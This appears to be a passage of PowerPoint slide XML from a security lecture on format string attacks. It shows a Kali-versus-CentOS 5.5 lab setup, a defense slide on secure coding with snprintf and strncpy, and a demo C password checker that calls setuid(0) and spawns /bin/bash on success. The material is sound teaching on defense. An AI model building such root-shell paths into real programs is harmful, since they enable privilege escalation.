              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>The Attack Server is Kali-Linux and the Victim Server is CentOS 5.5.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>The Victim Server’s version is 5.5 so we can note that the later versions like 6.0 CentOS have modified this vulnerability so strong to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t> attack.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="337853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3F1A6365-9085-49EC-9100-C390DB4D7CDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6761580" y="923407"/>
            <a:ext cx="5328592" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Correct the vulnerable part (secure coding for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formatstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="직선 연결선 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEFBB367-8F9C-4CF3-8EF2-2D66C2B98ACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240016" y="813116"/>
            <a:ext cx="0" cy="4272068"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A10B3061-1583-4B7F-B6E7-9FB5FAC6F606}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991544" y="5407212"/>
            <a:ext cx="9144000" cy="1406163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="2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This is secure code and this is also secure code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> (char * buffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>buf_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> char * format, ...) writes at most ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>buf_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>’ bytes (including he terminating null byte (‘\0’) to ‘buffer’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> (char * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> char * origin, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> n) stores ‘origin’ to ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>’ as much as ‘n’. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>They are not vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15"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18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789632" y="1700808"/>
            <a:ext cx="4377663" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="65000"/>
              <a:lumOff val="35000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>#include "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>RootPW.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> main (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>, char * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> []) { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> pass = 0; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>     char buff [512]; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>     if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> &lt;2) {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> ( "Failed: Usage [% s password] \ n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> [0]); return 1; } </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (buff), “%s”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [1]); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> ( "pass @% # 8x, [% d] [% # 8x] \ n", &amp; pass, pass, pass); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>     if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>strncmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> (buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>RootPW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> (), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> (buff) -1) == 0) { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> ( "\ n Correct Password \ n"); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>            pass = 144; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>     } </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>     else { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> ( "\ n Wrong Password \ n"); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>     } </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>     if (pass == 144) { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>     / * Now give root or admin rights to user * / </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> ( "\ n Root privileges given to the user \ n"); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> (0); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>          system ( "/ bin / bash"); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>     } </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>      return 0; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>} </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6761580" y="1718043"/>
            <a:ext cx="5112568" cy="2462213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>#include "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>RootPW.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> main (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>, char * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> []) { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> pass = 0; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     char buff [512]; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
